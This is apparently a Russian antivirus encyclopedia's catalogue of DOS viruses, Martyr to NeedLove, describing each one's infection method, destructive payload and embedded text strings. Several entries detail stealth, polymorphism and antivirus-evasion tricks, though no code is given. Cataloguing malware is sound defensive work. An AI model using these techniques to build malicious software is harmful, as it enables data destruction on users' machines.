Вирус перехватывает int 21h/ax=4b00h. В момент наступления такого события вирус определяет тип файла и исследует его на граничные значения. Если все проходит, вирус включает внутренний "отладчик" и ловит любой вызов int 21h. Далее определяет адрес его возникновения и предполагает, что его сгенерила запущенная программа. Затем вирус пытается вычислить этот адрес на диске (не составляет труда для COM, но довольно емкая процедура для варианта EXE) и проверяет,действительно ли эта инструкция существует в файле (тут как раз вирус и обходит упакованные файлы). В случае успеха, вирус сохраняет старое содержимое XX байт в этом месте и пишет туда расшифровщик с переходом на тело вируса ( XX - длина расшифровщика/перехода и составляет 22 для COM- файлов, 33 для EXE). При этом производится сравнение, этих кодов на диске и в памяти (дабы избежать порчу раскодировщика, например в случае релокаций). Далее вирус переписывает в конец перешифрованную копию, выключает свой "отладчик" и передает управление выполняемой программе. При инфицировании EXE-файлов, вирус может корректировать SP_Entry в заголовке EXE, помимо обязательной корректировки Pages_Count и Part_Page. Это объясняется тем, что стек может располагаться где-то за образом файла. При корректировке к значению SP_Entry прибавляется длина вируса плюс 3000h байт.

Martyr.641

Если в течение часа не было загрузки программ, выводит текст "Meня ты cлишкom долго МУЧАЛ ... Пpoщaй, мой друг ! Я УMИPAЮ ..." и перегружает систему.

Marzia-вирусы

Очень опасные файлово-загрузочные стелс-вирусы. Заражают MBR жесткого диска, COM и EXE-файлы. При открытии инфицированных файлов удаляют свой код из них. Содержат строку "MARZIA".

Marzia.2048

В зависимости от системного таймера форматируют случайный цилиндр на первой головке первого жесткого диска. Не заражают программы, заканчивающиеся на AN, OT, SK, PY.

Marzia.Baracuda

После 24 числа при старте некоторых антивирусных программ вызывает INT 24h AX=2. Содержит тексты "BARACUDA Vds" и "WW30V3".

Marzia.DV (2)

При старте некоторых программ могут уничтожить содержимое жесткого диска. Содержат строку "DVv1.00a3".

Marzia.FaXFree

В апреле после 25 числа при старте некоторых антивирусных программ вызывает INT 24h AX=2. Содержит тексты "PISello tenere fuori dalla portata dei bambini. PaxTibiQuiLegis.FaxFree!!", "WW20V".

Marzia.Pasiphae

В марте после 25 числа при старте некоторых антивирусных программ вызывает INT 24h AX=0. Содержит тексты "PASIPHAE©93Knosso by Willi Wonka PpHhIiSsIiCcAaRrTt", "WW?-?".

Marzia.Pisello

В апреле после 25 числа при старте некоторых антивирусных программ вызывает INT 24h AX=2. Содержит тексты "PISello tenere fuori dalla portata dei bambini.", "WW20V3".

Marzia.SZ

При старте некоторых программ может уничтожить содержимое жесткого диска, после чего выведет текст "SZ VIRUS". Содержит строку "WW35V3".

Marzia.VDS (1,2)

24 мая при старте некоторых антивирусных программ вызывает INT 24h AX=2. Содержит тексты "©93Virus Development Software", "WW34V3".

Marzia.WW (1)

В марте после 25 числа пытается отформатировать все цилиндры головки-1 первого жесткого диска. Содержит строку "WWMARZIA". Не заражает файлы с именем, заканчивающимся на OT (F-PROT).

Marzia.WW (2)

30-31 числа с мая месяца уничтожает по 7 секторов на каждом цилиндре 0 дорожки. Содержит текст "WW20V3".

Massacre.775

Опасный резидентный вирус. Может удалить стартующий файл.Содержит текст "[MIDNIGHT MASSACRE] V1.2 by Crypt Keeper".

Maximum.1198

Неопасный нерезидентный вирус. Иногда выводит сообщение:
Radio MAXIMUM virus ver.1.0 beta © 1995 D&M Software.
So... tell me, what is the frequency of Radio MAXIMUM?
и ждет ввода строки. Если ввести строку 103_7 (четвертая цифра значения не имеет), то вирус выводит текст:
Right!
Radio MAXIMUM - BEST Radio...
ждет нажатия на клавишу, после чего удаляет свой код (самоизлечивается) из стартовавшей программы. Если же значение "частоты" будет введено не такое, какое нравится вирусу, то будет выведен текст:
Error!
Now restarting...
и произойдет перезагрузка системы. Вирус также содержит строки "D&M.SYS COMMAND.IBMBIO.IBMDOS.DOS.PATH=".

MayDay.419

Устанавливает системную дату на 1 мая 1992 года. При возникновении критической ошибки (INT 24h) выводит строку "Today is May Day".

MBR77

После 77 заражений жестких дисков уничтожает информацию в 7 секторах флоппи-дисков.

Megadeth.3973, Megadeth.Sepultura

Неопасные резидентные полиморфные вирусы. Заражают COM и EXE-файлы, записывая свой код в их начало, а программный код перенеся в конец файла. EXE-файлы, таким образом, превращаются в формат COM-файла. При старте вирусы трассируют INT 20h до входа в обработчик INT 21h и устанавливают в определенной точке обработчика INT 21h межсегментный JUMP на собственный код. Для программы-жертвы вирусы строят префикс программного сегмента (PSP), настраивают EXE-файл с помощью таблицы перемещаемых элементов (relocation table) и отдают программе-жертве управление. Данное сообщение вирус Megadeth.Sepultura выводит также 20 сентября. Вирусы содержат серьезный механизм создания полиморфных копий. По имеющимся данным вирус Megadeth.3973 был создан учеником 10 класса Технического Лицея города-героя Севастополя. Данный ученик после идентификации его личности, как автора, помочь в детектировании своего же детища не смог.

Meht.1258, 1317

Опасные резидентные вирусы. Записывают свой код в 4 сектора, начиная с 10 сектора, на жесткий диск. Устанавливают часть своего кода в память по адресу 60:0. При вызове f.4b00h INT 21h (запуск программы), вирусы считывают 4 своих сектора с диска в память по адресу 9A00:0 и отдают этому коду управление. "Перехватывают" INT 8, 21h. Периодически звонят модемом по телефону 02. Содержат текст:
Meht.1258:
# Virus-MENT, v1.0 © MBD Poccuu. XI.1996 #
# HELLO, POLICE ! I`M, DIRTY USER, HAVE STEAL BILLY`S WINDOWS !
# POLICE OF THE WORLD, HANDS OFF FROM CYBERSPACE !
Meht.1317:
# Bupyc-MEHT, v1.0 © MBD Poccuu. XI.1996 #
# АЛЛО, МИЛИЦИЯ ! Я, ГРЯЗНЫЙ ЮЗЕР, УКРАЛ У БИЛЛИ ОКОШЕЧКИ !
# С #овым 1937-м годом, совковый киберспэйс !
# Да, здравствует российская милицияш и другие деревянные изделия...

MemLapse.787

Неопасный резидентный стелс-вирус. При открытии инфицированного файла удаляет свой код из данного файла. Содержит текстовую строку: "[Nympho Mitosis] v2.0 Copyright © 1993 Memory Lapse 5".

Mephisto.1235

Опасный резидентный шифрованный вирус. Иногда вызывает "буквопад" на экране. Уничтожает файлы *.?SM. Заражает файлы CO?????.?OM (COMMAND.COM). Содержит тексты "[NUMBER FIVE (Special) V 1.00]", "(Ы) Mephisto Switzerland".

Metallica.1739

Иногда рисует на экране могилу. Дублирует нажатие клавиш. Содержит строки "Manowar", "Metallica".

Mf.3490, 3503, 3564

Опасные полиморфные резидентные вирусы. Могут уничтожить содержимое CMOS-памяти, меняют на экране русские буквы, а также нажатия на клавиши р,а,с,е,p на г,a,c,э,р соответственно. Могут вывести сообщение:
Merlin from AMBER: FUCK YOU MAN!
Блокируют доступ к удаленным файлам. Проверяют ввод строк с клавиатуры. Если введено "Tell me your ver, mf!", то вирусы выводят тексты:
Mf.3490 : My ver is MF v10.1
Mf.3503 : My ver is MF v10.1
Mf.3564 : My ver is MF v10.0
Если введена строка "Do your job, mf!", тогда выводят текст: "Yes, I got it, man." и уничтожают содержимое CMOS-памяти.

Mf.4270, 4625, 5088

Опасные файлово-загрузочные полиморфные вирусы. Перехватывают INT 10h, 13h, 16h, 17h, 1Ch, 21h. При печати на принтер меняют буквы рРеЕ на гГэЭ. "Трясут" экран. Если версия DOS ниже 5.00 - выводят сообщение "Invalid parameter missing". При неаккуратном обезвреживании в памяти резидентной копии вирусы могут вывести текст "Не занимайтесь самолечением, друг мой !". При вводе "stop creeping" вирусы обезвреживают в памяти собственные процедуры заражения файлов. Если ввести "do it right now", то вирусы уничтожают содержимое CMOS-памяти. Вирус Mf.5088 при вводе строки "set password" устанавливает пароль для CMOS-памяти и выводит текст "Affirmative !!!".

MGen.Garden

Очень опасный полиморфный вирус. Производит поиск *.COM, *.EXE-файлов и записывает свой код поверх программного кода. Может выводить сообщения: "Not enough memory.", "I need 4K more to start myself!", "FUCK PEARL JAM!!!!LONG LIVE TECHNO!!!!". А также содержит тексты: "[Garden]This is Garden V1.0.Very simple virus.New version will be better!!!" и "[MutaGen 1.00] MnemoniX".

MGen.Secret

Опасный полиморфный вирус. 17 числа записывает в C:\COMMAND.COM код, производящий перезагрузку системы, выводит текст:
IN MY SECRET GARDENI'AM LOOKING FOR THE PERFECT FLOWER
I AM GOING TO FUCK YOUR HARD DISK IF YOU DON'T TYPE THE RIGHT PASSWORD.
DON'T TURN OFF YOUR COMPUTER BECAUSE I ALREADY FUCKED YOUR HARD DISK
AND I WILL FIX IT ONLY IF YOU ENTER THE RIGHT PASSWORD!!!
PASSWORD IS:
Содержит строки "[Secret Garden] by Nipple", "[MutaGen 1.00] MnemoniX".

MGUL.950

Опасный стелс-вирус. 30 ноября, 11 июня и 31 декабря уничтожает MBR и Boot-сектор активного раздела. Содержит строку "МГУЛ. ВТБ-11. v1.0".

MGUL.1807

Опасный резидентный вирус. После 18 числа месяца удаляет файл C:\COMMAND.COM. Содержит текст "The new generation of MGUL (MLTI) presents MGUL-1807".

MGUL.1953, 1962

Опасные стелс-вирусы. 30 ноября и 11 июня уничтожают MBR. В результате этого компьютер будет циклиться на перезагрузке ("вечная перезагрузка"). Удаляют программы, содержащие буквосочетания -V, AD, SC, AI, при их запуске Содержат строки: MGUL.1953 - "MGUL. v.2.5", MGUL.1962 - "МГУЛ. v.2.0".

Mh.792, 1432, 1438, 1481, 1503, 1538

Неопасные резидентные шифрованные вирусы. Mh.1432,1438,1538 - файлово - загрузочные вирусы,которые заражают файлы и MBR первого жесткого диска. Mh.1481, 1538 пытаются найти и заразить COM и EXE-файлы на диске C: в директории DOS, не заражают файлы, указанные в следующем списке (по 4 символа на имя): AVG.ASTASTRODPMIRTM.SCAN.

Michelangelo (1-5)

Очень опасные boot-вирусы. 6 марта, в день рождения Микеланджело, уничтожают информацию на диске, с которого произошла загрузка системы. Michelangelo (3) уничтожает информацию 18 февраля, Michelangelo (4) - 26 мая. Michelangelo (5) пытается заместить собой всех своих "родственников" и 21 мая выводит текст "ANTI March6 Karpachev Dmitr.".

Mickie.1100

Неопасный резидентный шифрованный вирус. Содержит текстовую строку "Mickie lives... somewhere in time! © 1995 Grave Lion".

Microb.431

Опасный резидентный вирус. 13 числа выводит текст "MICROB I" и уничтожает информацию на первом жестком диске.

Milan.Naziskin.270, 335

В апреле пытаются уничтожить Boot-сектор несуществующего диска (AL=80h INT 26h). или Boot-сектор диска A:. Содержат текст "Copyright by German NaZiSkIn Virus Club 1992- Forever Here lies you poor dead computer May it sees the dawn!!!".

Milan.Prodigy

Опасный замещающий вирус. В 1997 году выводит текст:
Pr0diGy VeEr0oZ © 1995 c.wad,
doom2.wad, doom.wad, kb2.dat, MPSLOGO, geodata\world.dat, mkset.bin,
FONTS.LBX, DESCENT.HOG, angbang.cnf вирус выводит текст:
Memory alloction error
System halted
и "вешает" систему. Имеет текст "MIPT 15.04.96©TERMINATOR".

Mipt.2000

Неопасный резидентный вирус. Создает файл C:\DOS\COUNT.SYS. Содержит текст "MIPT (72) © EliteSoft February 1996 ****** 50 YEAR PhysTech ******".

MIREA.1766, MIREA.2087, MIREA.2117

Полиморфики. После 1000 нажатий на клавиши в буфер клавиатуры помещают следующие слова:
MIREA.1766 - "МИРЭА-IV",
MIREA.2087 - "МИРЭА-X",
MIREA.2117 - "МИРЭА-XI".

MIREA.4156

Производит поиск EXE-файлов, чтение из файла и запись в файл через INT 25h и INT 26h. Файлы могут быть поражены в любом директории текущего диска. Полиморфик. Содержит ошибки, из-за которых неработоспособен на диске с 12битовой FAT. Иногда, по окончании своей работы, может выдать текст:
Заранее прошу извинения.
Чистая случайность, что ЭТО попало к Вам.
По классификации Е. Касперского это типи-
чная "студенческая" программа, причем в
наихудшем ее исполнении:
- портит оверлеи ( если не повезет, то и
резиденты тоже ),
- портит забитый до отказа диск,
- содержит большое число ошибок,
- имеет большой размер,
и т.д.
Чего еще можно ожидать от студента МИРЭА.
Ничего гадкого , кроме распространения
программа не делает ( я на это надеюсь,
хотя от "студенческой" можно ожидать все-
го из-за ее крайней примитивности и боль-
шого числа ошибок ).
МИРЭА - хороший ВУЗ!!!
МИРЭА - это звучит гордо!!!
МИРЭАзм не объяснить, в нем надо жить!!!

Minsk.1075

При каждом 20ом чтении из DBF-файлов вместо прочитанных байт возвращает нули. Содержит опасную ошибку: при инсталляции в память вместо вызова INT 21h может вызвать INT 15h (15h=21d).

Mirror.482

Очень опасный резидентный вирус. При каждом 1000 вызове INT 21h вирус переворачивает изображение на экране и записывает в MBR жесткого диска 5 байт прямого межсегментного перехода на перезагрузку JUMP F000:FFF0.

Mirror.4130 (1,2)

Неопасные полиморфные вирусы. Могут установить свою TSR-копию в область UMB. Содержат текст "[ Mirror: Bit Addict / TridenT ]". Есть модификация вируса, содержащего текст "Moonchild © Dread Lord // FotD". Видимо, этот "Dread Lord" ничего больше не умеет, кроме того, чтобы гордо поставить свое лого в чужой вирус.

Mmca.505, 879, 882, 1131

Неопасные резидентные вирусы. Mmca.879, 882, 1131 - зашифрованы. Содержат текст "ММСА_КПИ".

MME.Ssr.18273, 18364, 19071, 19834

Очень опасные резидентные полиморфные вирусы. Содержат несколько разнообразных расшифровщиков. Предпоследний декриптор использует алгоритм случайной расшифровки последнего декриптора и основного тела вируса, каким-то образом похожий на алгоритм вирусов RDA, но слабее по реализации. Последний расшифровщик использует динамическую расшифровку тела вируса с помощью INT 01. Dирусы уничтожают случайный сектор логического диска C:. Вирусы удаляют файлы, имеющие расширения PAR,PIF,ICO,WEB,°°°, PAS,BAS,AVB,FRQ,311,312,TPU,GIF,JPG,NLM,STM, MOD, CPP, DOT,я подставляя вместо имени текст "Шит !". Не заражают файлы, содержащие в своем имени буквосочетания (по 2 символа на имя) из строки: DRAIADCOHIAVWIKEUSGD. При старте программы, содержащей в своем имени сочетание символов ID (AIDSTEST.EXE) вирусы выводят на экран текст "А не пора ли г-ну Лозинскому на пенсию !". MME.Ssr.19834 выводит другой текст: "Ты еще не выбpосил этот suxx на помойкy ?! :)".Резидентные копии вирусов содержат всевозможные манипуляции со "врезкой" в оригинальный обработчик INT 21h двух байт вызова INT ACh, который в свою очередь вызывает INT ABh, который возвращает управление INT 21h через INT 2Ah... В общем, все это оставляет чрезвычайно гнетущее впечатление от чрезмерных потуг господина вирусописателя... Для обмана резидентных мониторов вирусы используют некоторый прием по изменению расширения имени файла, которое восстанавливается из ядра DOS с помощью INT 2Ah. Файлы, упакованные PKLITE, вирус заражает нетрадиционным способом - корректируется стартовый код распаковщика PKLITE таким образом, что управление должно попасть на участок кода, выводящий текст "Not enough memory" и завершающий работу программы. Но вирус внедряет в данный участок кода переход на собственное зашифрованное тело. MME.Ssr.19834 использует в коде расшифровщика инструкции 386 процессора. Также MME.Ssr.19834 при заражении некоторых файлов считывает 4000h байт данного файла в буфер и пытается найти следующие последовательности байт 0B4h,??, 0CDh, 21h или 0B8h,??,??,0CDh,21h (вызов прерывания DOS 21h с некоторыми значениями в регистрах AH или AX) и изменяет данные последовательности байт в строку с первым байтом 0F0h. Далее следуют зашифрованные по некоторому алгоритму значения регистров AH или AX. Резидентная копия вируса "перехватывает" INT 6 (invalid opcode - неправильная команда). При выполнении инструкции, имеющей первый байт команды - 0F0h, системой генерируется INT 6, который контролируется вирусом. В результате вирус расшифровывает значение регистра AH или AX, записывает в память, откуда "пришла" несуществующая команда, правильный первый байт команды, значение регистра и вызов INT 21h (0CDh, 21h). Т.о., при наличии в памяти резидентной копии вируса MME.Ssr.19834, все "разрушенные" программы будут работать нормально, а при отсутствии вируса, скорее всего они "завесят" систему.Вирусы содержат огромное количество ошибок, из-за которых "нормальная их жизнедеятельность" практически невозможна. При детектировании вируса MME.Ssr.19071 программа Dr.Web определяет его в инфицированных файлах, как MME.Ssr.18273.

Mnemonix.A-Bomb

Неопасный резидентный шифрованный стелс-вирус. Заражает COM-файлы при их старте или закрытии. При открытии инфицированных файлов, вирус удаляет из них свой код. Содержит строку "[A-BOMB V1.0с] By Mnemonix 1994".

Mnemonix.BW.1027

Неопасный нерезидентный шифрованный вирус. Содержит текстовую строку "[BW] [DP/4] Dementia Praecox MnemoniX '94".

Mnemonix.Esp

Неопасный полиморфный резидентный вирус-спутник. Содержит строку
"[ESP/Sixth Sense] by MnemoniX".

Mnemonix.LoTek.856

Содержит строку "[BW с] [Lo Tek] by MnemoniX".

Mnemonix.Neuropath

Неопасный резидентный полиморфный вирус. Создает файл, состоящий из 2 символов со значением 256 (FFh), в текущем каталоге. При открытии файлов программами SCAN, CLEAN, вирус подставляет им созданные им файлы FFFFh. Содержит строку "[Neuropath] MnemoniX".

Mnemonix.Sugar

14 числа выводит на экран строку "[C6H12O6] ". Имеет текстовую строку "Blood Sugar by MnemoniX".

Moctezuma.2208, Moctezuma.2416

Очень опасные резидентные полиморфные вирусы. Перехватывают INT 08, 13h, 21h. При чтении или записи секторов через INT 13h изменяют два случайных байта. INT 08 используют для создания холостых циклов. Moctezuma.2208 иногда сдвигает квадрат размером 12x12 в левой части экрана на 2 строки вверх. Содержат текст "Moctezuma's Revenge".

Monarch.1040

Очень опасный шифрованный вирус. При старте инфицированного файла, вирус производит поиск COM и EXE-файлов в текущем каталоге и заражает их, причем EXE-файлы заражаются также, как и COM. В дальнейшем при старте такого "бывшего" EXE-файла вирус выводит сообщение "Error in EXE file". Если в текущем каталоге COM и EXE-файлов нет, либо они уже все заражены, то вирус выводит сообщение "Bad command or file name", "перехватывает" INT 21h и оставляет в памяти свою резидентную копию, заражающую файлы при их открытии (f.3Dh INT 21h). Автором планировалось заражение файлов и при запуске, переименовании, смене атрибутов,.. но в данном месте допущена ошибка. Если размер файлов-жертв менее 666 байт или больше 64000 байт (но менее, чем 64K - ошибка автора), то вирус записывает в начало таких файлов 6 байт кода перезагрузки системы и следующий текст:
This program was written in USSA © 1879-1953 Red monarch
В файлы, имеющие расширение ?AP, вирус также записывает вышеобозначенный текст. Безнадежно портит файлы больше 64K при попытке их заражения. При заражении 13 файлов вирус пытается уничтожить Boot-сектор дискеты в третьем дисководе.

Monkey (1,2)

Неопасные Boot-вирусы. При заражении шифруют оригинальный Boot-сектор. Содержат зашифрованную строку "Monkey".

Mosquito.768

Опасный резидентный вирус. Внедряет свой код (768 байт) в точку входа EXE-файлов, перенося программный код в конец файлов. Из-за ошибок может разрушить некоторые файлы. "Перехватывает" INT 10h, 21h. При выводе на экран меняет букву "с" на "ш", а при выводе буквы "а" пищит динамиком. Содержит текст "Mosquito.(Crazy)".

MP.1024

Очень опасный нерезидентный вирус. Записывает в MBR жесткого диска троянский код, который 9 или 10 числа месяца уничтожает информацию на "винчестере".

MPhTI (1-3)

Опасные загрузочные вирусы. Могут уничтожить несколько секторов дисков. Содержат текст "1991,МФТИ".

MrD.1536

Может разместить свою TSR-копию в UMB. 31 числа месяца устраивает на экране движение букв и символов. Содержит строки "VIRPU" и "Mr. D".

MrD.1569

Зашифрованный резидентный вирус. Предпринимает всевозможные ухищрения для затруднения анализа вирусного кода. Перехватывает INT 1Ch, 21h, 2Fh. Содержит текстовую строку "VIR MKS AV NV TB". Файлы, содержащие данные буквенные последовательности вирус не заражает. После заражения файла вирус пытается удалить файл с таким же именем, но с расширением, в котором вместо первой буквы будет присутствовать символ "_", например, для файла EXEFILE.EXE вирус после его заражения попытается удалить файл EXEFILE._XE (?). Иногда вирус устраивает видеоэффекты: либо сдвигает постепенно весь экран на одну строку вниз, либо меняет местами два случайных символа на экране.

MrHu

Очень опасный шифрованный Boot-вирус. При заражении производит поиск инструкции STI (0FBh) в MBR или Boot-секторе диска и внедряет сразу за данной найденной инструкцией 37 байт своего кода, производящих считывание второго вирусного сектора - "хвоста", расположенного в последнем секторе диска. Иногда уничтожает информацию на диске, с которого происходила загрузка системы. После чего выводит в пятую видеостраницу (?) текст "© Copyright Mr. Hu 1992-93 V1.00".

MtE-вирусы

MtE (MuTation Engine) - полиморфный генератор вирусных шифровщиков и расшифровщиков. Создан известным болгарским вирусописателем, известным, как Dark Avenger. Данный генератор является "родоначальником" полиморфных генераторов.

MtE.Encroacher

Опасный нерезидентный полиморфный вирус. Уничтожает файлы chklist.cps, C:\CPAV\CPAV.EXE, C:\CPAV\VSAFE.COM. Периодически записывает в EXE- файлы текущего каталога 'троянскую' программу, перезагружающую компьютер. Содержит текстовые строки: "ENCROACHER is here", "*.COM chklist.cps C:\CPAV\CPAV.EXE C:\CPAV\VSAFE.COM *.EXE".

MtE.Fear

Очень опасный нерезидентный полиморфный вирус. Периодически стирает случайные сектора дисков. Содержит строки: "Fear VirusCreated on 2-5-92 by PkaHerONEhp", "You have nothing to fear except FEAR itself...kein '.' oder '..' Verzeichnis ist zugeordnet Eintrag .. nicht wiederherstellbar Eintrag hat eine fehlerhafte".

MtE.Groove

Очень опасный полиморфный вирус. Уничтожает файлы C:\NAV_._NO, C:\NOVIRCVR.CTS, C:\NOVIPERF.DAT, C:\CPAV\CHKLIST.CPS, C:\TOOLKIT\FILES.LST, C:\UNTOUCH\UT.UT1, C:\UNTOUCH\UT.UT2, C:\VS.VS. После заражения файла может вывести сообщение:
Dont wory, you are not alone at this hour...
This Virus is NOT dedicated to Sara
its dedicated to her Groove (...Thats my name)
This Virus is only a test Virus therefor
be ready for my Next Test ....

MtE.Insuff

Нерезидентный очень опасный вирус полиморфный вирус. Ищет COM-файлы и записывается вместо них. Содержит строки: "Insufficient memory", "Out of stack", "Not enough memory".

MtE.LC92

Очень опасный полиморфный вирус. Если все файлы уже заражены, то он стирает случайно выбранный сектор случайно выбранного диска. Содержит в себе строку: MuTant Engine COM Infector - Research Vers 1 © LiquidCode 92

MtE.Metal

Резидентный полиморфный вирус. Содержит строки: "Into the darkness march the armies of the night", "Bound by Metal we live to fight".

MtE.Mother

Нерезидентный полиморфный вирус. Содержит тексты: "Ripped this Motherfucker off SHIT!!! Wont work...." и "We dedicate this little virus to Sara Gordon who wanted to have a virus named after her."

MtE.Pogue

Неопасный резидентный полиморфик. Иногда играет мелодию. Содержит тексты: "TNX2DAV", "Pogue Mahone!".

MtE.Questo

Нерезидентный опасный полиморфный вирус. Стирает Boot-сектора дисков. Содержит текст: "Questo sistema К stato infettat*.COM".

MTZ.971

Неопасный, самошифрующийся вирус. В зависимости от времени может вывести на экран текст: You are lucky. Full moon tonight.! Содержит текстовую строку: MTZ Virus 1.0 - From Italy

MTZ.1907

Неопасный, полиморфный стелс-вирус. Перехватывает прерывания 3h, 15h, 21h. Активизируется если версия DOS не ниже 5.0. Устанавливается резидентно в область UMB. Заражает файлы при вызове функций DOS FindFirst, FindNext. При нажатии на Ctrl-Alt-Del выводит на экран:
Y.K.K. - © M T Z - Italy!
Good Luck Today

MTZ.Overkill.2624

Неопасный полиморфный стелс-вирус. Активизируется если версия DOS не ниже 5.0. Устанавливается резидентно в область UMB. Заражает файлы при вызове функций DOS FindFirst, FindNext, EXEC. При резидентном вирусе, при открытии файла - удаляет вирус из файла, а при закрытии вновь заражает его. 30 числа любого месяца, в зависимости от систем- ного времени, может вывести текст: Overkill IV Virus - By MTZ - From Italy - (Cazzo! Anche oggi un altro 2 di picche, ma si puo' andare avanti cosi' ?)

MTZ.PinkPanther.4510, MTZ.PinkPanther.5081

Очень остроумно определяют оригинальный адрес обработчика INT 21h, перехватив INT 6 и "забив" ядро DOS байтами 0FFh, предварительно скопировав данное ядро в область UMB. Содержат расшифровщик, извлекающий начальные значения регистров из стека. PinkPanther.4510 содержит текстовую строку: 2 - The Pink Panther - © MTZ Sept. 1993 Italy PinkPanther.5081 31 декабря выводит на экран текст: Pink Panther 2 (*The Last One*) - © MTZ '1 Jan 1994' Italy Также в своем теле содержит строку: "Dedicated to Federica!"

Muhamor.4608

Неопасный резидентный вирус. Не заражает файлы, содержащие в своем имени буквосочетание "WE". Записывает в файл C:\WINDOWS\LOGOS.sys WHERE THE PEOPLE MAKES VIRUSES FOR YOUR COMPUTER! NOW, IN SPANISH: иSABES LO FACIL QUE RESULTARIA BORRARTE TODOS LOS FICHEROS DEL DISCO? O MEJOR AUN: FORMATEARLO. QUE PASES UN FELIZ DIA.

Murky

Очень опасный загрузочный вирус. Вирус перехватывает INT 13h (операции с диском) и при записи секторов через функцию AX=3 записывает данные сектора, используя другую функцию AX=0Bh (длинная запись) INT 13h. При чтении же этих секторов через стандартную функцию AX=2 INT 13h, если происходит ошибка чтения (т.к., сектор, записанный через "длинную запись" не может быть прочтен стандартным способом), то вирус считывает "сбойные" сектора с помощью функции AX=0Ah (длинное чтение), и, таким образом, создает видимость нормальной работы системы. При удалении же вируса из памяти, жесткий диск становится недоступен средствам DOS. Программа Dr. Web после удаления вируса из MBR жесткого диска автоматически приступает с "исправлению" жестких дисков. Помните, что данная операция может быть довольно продолжительна по времени. Murky содержит текст "Murky".

Murphy.1008

Опасный резидентный вирус. Удаляет *.ZIP файлы.

Murphy.Tormentor

Очень опасный вирус. 2 числа месяца уничтожает 255 секторов на всех головках первого жесткого диска. Содержит строки: "NUKE!", "TORMENTOR,soldier of -=DY=-", "[Thanks DAv!] DEMORALIZED YOUTH!".

Mururoa.2464, 3443

Неопасные резидентные шифрованные вирусы. Не заражают программы, начинающиеся на: avg,fv386,turbo,fv86,guard, toolkit, scan, virlab,vir,asta,vc,sswap,debug,td,stacker,alik,rex,msav, cpav,nod,clean,f-pro,tbav,tbdriver,tbclean,tbscan,avast,nav,vshie,dizz, command, vsafe. Mururoa.3443 содержит тексты: "I am in LOVE now... ZUZANKA B.B. in Slovakia <:)<8<","For M.T.: Vivat Ziar nad Hronom.. 8)) Uz si rad ?? RADAR v PC Revue 9/94".

MusicBug

Неопасный загрузочный вирус. Иногда проигрывает мелодии.Содержит тексты "MusicBug v1.06. MacroSoft Corp.", "-- Made In Taiwan --".

MVF.1866, MVF.1896

Резидентные вирусы, перехватывают INT 21h. Но при вызове некоторых функций INT 21h, пытаются найти COM-файлы и заразить их. В пятницу 13 выводят сообщения:
THE MVF-FILEVIRUS
Programmed 1991 by the MVF
MAD Virus Factory

Mw.278

Неопасный резидентный вирус. Заражает COM-файлы только при копировании (создании). После 13 заражений выводит текст "Fuck off" и блокирует работу системы.

0

14

N

Nadym.493

Неопасный нерезидентный вирус. Иногда выводит на экран текстовую строку "[VivatNadym] v.1.0 [1998]". Также содержит текст "Proudly by [GloomyTanat]".

Nadym.934

Неопасный нерезидентный шифрованный вирус. 2 июня, 3 сентября или 1 апреля вирус выводит на экран один из следующих текстов:
[Yanush Milovski] and [GloomyTanat]
Thanks to Yana Diagileva for their songs
Thanks to Shunya for their love and hate
And Thanks You Stupid User for using our virus
Relax man ... relax ...
[VivatNadym] v.2.0 [1998]
Hello, Welcome to the Psychiatric Hotline.

Nadym.1058

Опасный нерезидентный вирус. Иногда переименовывает C:\AUTOEXEC.BAT в C:\AUTOEXEC.NAD, создает новый файл C:\AUTOEXEC.BAT.

Nameless.3000

Очень опасный резидентный шифрованный вирус. При старте инфицированной программы вирус "выкусывает" свой код из нее, запускает ее, а потом вновь заражает. Иногда, в зависимости от своих внутренних счетчиков или при неаккуратной трассировке, уничтожает содержимое жесткого диска, а также периодически уничтожает содержимое случайных секторов логических дисков. Содержит текст "Nameless virus v.2.0 Глазовская водка-лучшая в России! Завалим юзеров вирусами! Игорь, помоги назвать вирус (только не Nameless) U my last hope... Please...".

Natas.4740, 4744, 4746, 4766, 4774, 4786, 4826, 4918, 4988, 5228

Очень опасные файлово-загрузочные полиморфные вирусы. Заражают MBR "винчестера", Boot-сектора флоппи-дисков, COM и EXE-файлы. Не заражают файлы, обрабатываемые программами PKZIP, PKUNZIP, ARJ и LHA. В зависимости от своих счетчиков могут отформатировать жесткий диск. Содержат текстовые строки: "Natas" и "BACK MODEM". Natas.4746 содержит ошибку в процедуре заражения MBR и Boot-секторов дискет. В результате этого система перестанет загружаться с таких дисков и восстановление оригинальных MBR и Boot-секторов окажется невозможным. Natas.4774 имеет текст "Time has come to pay ©1994 NEVER-1". Natas.4988 содержит следующий текст:
Yes I know my enemies
They're the teatchers who taught me to fight me
Compromise, conformity, assimilation, submission
Ignorance, hypocrisy, brutality, the elite
All of whitch are American dreams
© 1994 by Never-1(Belgium Most Hated) Sandrine B.

Nax.858

Опасный резидентный вирус. Из-за ошибки разрушает инфицируемые файлы. При нажатии на клавишу F5 вирус меняет ее в буфере клавиатуры на F8 и наоборот - F8 на F5.

Nax.1402

Опасный резидентный вирус. Каждое четвертое нажатие на клавиши \/:;<>()[],.90 изменяет на /\;:><)(][.,09, а также F5->F8, F6->F8, F8->F5,Enter->Escape,Escape->Enter.

NearDark

После загрузки с жесткого диска может вывести строку "NearDark", после чего уничтожит Partition Table.

Necros.1164

Неопасный резидентный полиморфный вирус. Заражает COM-файлы, внедряя свой код в их начало. EXE-файлы заражает, как вирус-спутник. Т.е., создает COM-файл, содержащий вирусный код с именем EXE-файла. 21 ноября выводит на экран текст:
Virus V2.0 © 1991 Necros The Hacker.
Written on 29,30 June in Tralee, Co. Kerry, Ireland.
Happy Birthday, Necros!
Содержит строку "Virus V2.0 [FrIEND]".

NED-вирусы

NED (NuKE Encryption Device) - полиморфный генератор вирусных шифровщиков и расшифровщиков. Содержит текстовую строку: [NuKE] Encryption Device v1.00 © 1992 Nowhere Man and [NuKE]

NED.ItsHard

Опасный нерезидентный полиморфный вирус. В декабре пытается отформатировать 32 цилиндра первого жесткого диска, после чего перезагружает компьютер. Содержит строку IT'S HARD. SMAUG REIGNS SUPREME AS THENEW FORCE IN VIRUS WRITING. SMIRK. SMIRK. POOF!

NED.Tester

Нерезидентный полиморфный вирус. Перед заражением файла выводит текст: "Test virus successful!". Содержит строки: "*.COM", "[VCL]".

NeedLove.5000

Опасный резидентный шифрованный вирус. В вирусе присутствуют некоторые процедуры, которые никогда не получают управления. Так, видимо, в январе вирусу хотелось бы вывести на экран текст "ALL YOU NEED IS LOVE!" и запустить по экрану "бегущие" справа налево разноцветные сердца разного размера, одновременно с этим последовательно читая сектора жесткого диска, видимо имитируя разрушение информации в них.

